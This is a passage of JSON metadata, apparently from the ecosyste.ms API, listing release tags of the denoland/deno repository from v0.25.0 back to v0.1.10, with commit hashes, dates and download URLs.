GitHub/repositories/denoland%2Fdeno/tags/v0.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0/manifests"},{"name":"v0.24.0","sha":"0fffef8e5afed754358efc5b41d93549592cd941","kind":"commit","published_at":"2019-11-15T03:52:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0/manifests"},{"name":"v0.23.0","sha":"a611788834e40153ef27c8f1d6b7fd52c8a016b1","kind":"tag","published_at":"2019-11-05T02:50:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0/manifests"},{"name":"v0.22.0","sha":"71efe6f2c530d1cb9e8a2679f5778e2c034a9d0d","kind":"commit","published_at":"2019-10-28T18:12:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0/manifests"},{"name":"v0.21.0","sha":"4e88ba9a114279b3969d5ccca1cca0f74c8fc1fd","kind":"commit","published_at":"2019-10-19T22:46:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0/manifests"},{"name":"v0.20.0","sha":"a4b27db21a10f9913460c054c98fce59f3dd157d","kind":"commit","published_at":"2019-10-07T16:57:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0/manifests"},{"name":"v0.19.0","sha":"3892cf59018acd71dd4bc1099d747bd683cd4118","kind":"commit","published_at":"2019-09-25T14:58:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0/manifests"},{"name":"v0.18.0","sha":"7e3296dad92cee2e8b77baedfbeca38aa297928e","kind":"commit","published_at":"2019-09-13T20:40:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0/manifests"},{"name":"v0.17.0","sha":"82588ec09c199683cff88097e1b90649497239c7","kind":"commit","published_at":"2019-09-04T21:15:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0/manifests"},{"name":"v0.16.0","sha":"0809b06a3938868f364f1343b0de4d5d9686495d","kind":"tag","published_at":"2019-08-22T22:12:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0/manifests"},{"name":"v0.15.0","sha":"58f0e9b9b1b53ca486ef38ae662b98cbde839248","kind":"commit","published_at":"2019-08-13T22:35:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0/manifests"},{"name":"v0.14.0","sha":"83d5362f1d7d8589b862de57912135067a8278c7","kind":"tag","published_at":"2019-08-09T01:48:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0/manifests"},{"name":"v0.13.0","sha":"b3541c38f5672ffb4a29d66dca19d88b9ecae478","kind":"commit","published_at":"2019-07-31T19:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0/manifests"},{"name":"v0.12.0","sha":"4e248ecda9bb31478c6db7f5e76fa12b64b516a9","kind":"tag","published_at":"2019-07-16T20:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0/manifests"},{"name":"v0.11.0","sha":"92ac616708cb067a1b895283913c5ecd25c6d873","kind":"tag","published_at":"2019-07-07T16:19:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0/manifests"},{"name":"v0.10.0","sha":"c56df45355c8e68eabbfa62021e7ca7484115c0b","kind":"tag","published_at":"2019-06-25T14:11:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0/manifests"},{"name":"v0.9.0","sha":"7b06aa37342c021f9f1fac99125847d134e67001","kind":"commit","published_at":"2019-06-15T16:04:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0/manifests"},{"name":"v0.8.0","sha":"d60bdb6350f2583e35d020f6cebb6aa30262fbcc","kind":"commit","published_at":"2019-06-08T19:16:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0/manifests"},{"name":"v0.7.0","sha":"5265bd7cb1f86af99b01d73c537d52a50df95fe2","kind":"commit","published_at":"2019-05-29T22:42:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0/manifests"},{"name":"v0.6.0","sha":"22feb74ba12215597416b5531f8a557302283e79","kind":"commit","published_at":"2019-05-20T19:22:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0/manifests"},{"name":"v0.5.0","sha":"23aca36d52220efbfbc07abbe165bd2c9ade2009","kind":"commit","published_at":"2019-05-11T21:19:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0/manifests"},{"name":"v0.4.0","sha":"2aae09c2b869bf5d0bc5fd269464e8ac504528ea","kind":"commit","published_at":"2019-05-03T23:33:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0/manifests"},{"name":"v0.3.11","sha":"3b1e2f1ad42cfebb6f2568e54c82c5ac3c8fe3d4","kind":"commit","published_at":"2019-05-03T22:05:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11/manifests"},{"name":"v0.3.10","sha":"40d8ef1ec9f5e50017c41af8bf3b9f8454f97544","kind":"tag","published_at":"2019-04-25T20:00:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10/manifests"},{"name":"v0.3.9","sha":"e725b26b289fbe96b679039ba4203f10f7229ab9","kind":"tag","published_at":"2019-04-25T15:46:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9/manifests"},{"name":"v0.3.8","sha":"0796a8f2f75005df95ef6115a4bdf6dd66e58dc3","kind":"commit","published_at":"2019-04-19T15:41:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8/manifests"},{"name":"v0.3.7","sha":"8584d80cfd26111825af5a69fc6ae4c367ad0700","kind":"commit","published_at":"2019-04-11T19:35:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7/manifests"},{"name":"v0.3.6","sha":"744e56cb58f90acde7baf8811676021fb55b2f2a","kind":"tag","published_at":"2019-04-04T14:04:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6/manifests"},{"name":"v0.3.5","sha":"b965c7ab367a417fb7bdde2eaf38312179e5c183","kind":"commit","published_at":"2019-03-28T20:58:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5/manifests"},{"name":"v0.3.4","sha":"223a2adbb46cb33e75ffe861ecaff6ff7e6d555e","kind":"commit","published_at":"2019-03-20T22:54:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4/manifests"},{"name":"v0.3.3","sha":"3dbb06e699398549e8cfabc896ef3256ab433cba","kind":"tag","published_at":"2019-03-13T18:16:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3/manifests"},{"name":"v0.3.2","sha":"535037b519711d238dc0bfa2c4d2ffb4b17dec53","kind":"commit","published_at":"2019-03-07T02:22:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2/manifests"},{"name":"v0.3.1","sha":"b0c7b54f692ecc866d4f70bfa384631523bbf924","kind":"commit","published_at":"2019-02-27T21:20:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1/manifests"},{"name":"v0.3.0","sha":"a5720d9e28f7ee5868049504816405392c2821d7","kind":"commit","published_at":"2019-02-19T04:22:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0/manifests"},{"name":"v0.2.11","sha":"b2fb8261e700c75cfb9a626ae57bbd3098e08454","kind":"commit","published_at":"2019-02-09T04:34:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11/manifests"},{"name":"v0.2.10","sha":"c3241822522fb2b13792fe5666596888057cf829","kind":"commit","published_at":"2019-02-02T23:26:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10/manifests"},{"name":"v0.2.9","sha":"1681bda14d1552860645e40f91f667accefe50cb","kind":"commit","published_at":"2019-01-30T03:57:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9/manifests"},{"name":"v0.2.8","sha":"a47d545e4d0831713d0107e86cead7b4506a9bf6","kind":"commit","published_at":"2019-01-19T16:54:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8/manifests"},{"name":"v0.2.7","sha":"eb4a19ef6ef1c5ae797fb515c45627deca65cf31","kind":"commit","published_at":"2019-01-15T01:25:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7/manifests"},{"name":"v0.2.6","sha":"404e6f86345216c9205cabb88b19eaca762095e0","kind":"commit","published_at":"2019-01-07T22:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6/manifests"},{"name":"v0.2.5","sha":"320577c131c8058ba0065f26119ce1ce18bc23d2","kind":"commit","published_at":"2019-01-01T19:30:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5/manifests"},{"name":"v0.2.4","sha":"c6e2fffc1388cdb4411d6c2cff36c4febb7c75d5","kind":"commit","published_at":"2018-12-24T04:39:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4/manifests"},{"name":"v0.2.3","sha":"c69d2f554d05ba9e4d09af6ae451ce5676876e61","kind":"commit","published_at":"2018-12-14T20:11:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3/manifests"},{"name":"v0.2.2","sha":"e6121762f8bf3c531c4c60229ff4a156ae21d931","kind":"commit","published_at":"2018-12-07T22:44:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2/manifests"},{"name":"v0.2.1","sha":"b5c6bfa0c8a3df9598211bc68db5408f5eec147d","kind":"commit","published_at":"2018-12-01T00:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1/manifests"},{"name":"v0.2.0","sha":"d083f7271b11d87ddba90869d2bcd2cf312e77af","kind":"commit","published_at":"2018-11-16T05:23:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0/manifests"},{"name":"v0.1.12","sha":"0c740ff85d855177d1619276154f63a36ed31557","kind":"commit","published_at":"2018-11-12T17:16:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12/manifests"},{"name":"v0.1.11","sha":"e1d5f82d36f08b9c7a7c6233b7ce354a5cf82836","kind":"commit","published_at":"2018-11-05T22:51:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11/manifests"},{"name":"v0.1.10","sha":"da959e8c878382ce3417ab61db8ccf1ae9a660fa","kind":"commit","published_at":"2018-10-27T15:13:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositorie